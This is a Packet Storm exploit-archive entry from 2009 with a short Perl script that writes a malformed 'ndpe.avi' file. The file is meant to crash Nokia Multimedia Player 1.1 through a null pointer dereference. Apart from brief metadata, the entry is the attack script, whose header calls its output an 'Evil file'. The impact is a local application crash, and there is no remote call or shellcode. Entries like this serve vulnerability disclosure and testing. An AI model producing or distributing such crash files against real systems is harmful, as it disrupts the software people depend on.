Nokia Multimedia Player 1.1 .AVI Exploit

2009-01-26T00:00:00
ID PACKETSTORM:74297
Type packetstorm
Reporter Zigma
Modified 2009-01-26T00:00:00

Description

                                        
                                            `#!/usr/local/bin/perl  
#  
# Application : Nokia Multimedia Player  
# Version : v 1.1  
# Bug : Local (.AVI File) Null Dereference Pointer Exploit  
# Exploit Method : Local  
# Author : Null Area Security  
# Zigma [zigmatn @ gmail.com]  
# IRC : irc://irc.nullarea.org/#nullarea  
# Home : http://NullArea.NET  
#  
# Description : Opening a malformed .AVI file with Nokia Multimedia Player version 1.1 causes it to point to Null Pointer [00000000] which leads to crash the application .  
#  
# " Access violation when reading [00000000] - "  
#  
$area = "ndpe.avi";  
  
$null = "\x4A\x75\x73\x74\x00\x41\x6E\x79\x74\x68\x69\6E\x76\x00".  
"\x54\x75\x6E\x96\73\x69\x61\x00\x52\x75\x6C\x6C\x7A\x7A";  
  
print "\nFuzzing Nokia Multimedia Player v 1.1\r";  
print "\n\n[+] Evil file to make : $area ...\r\n";  
sleep(2);  
  
open(avi, ">./$area") || die "\nCannot open $area: $!";  
  
print avi "$null";  
  
close (avi);  
  
print "\n[+] File $area successfully created!\r\n";  
`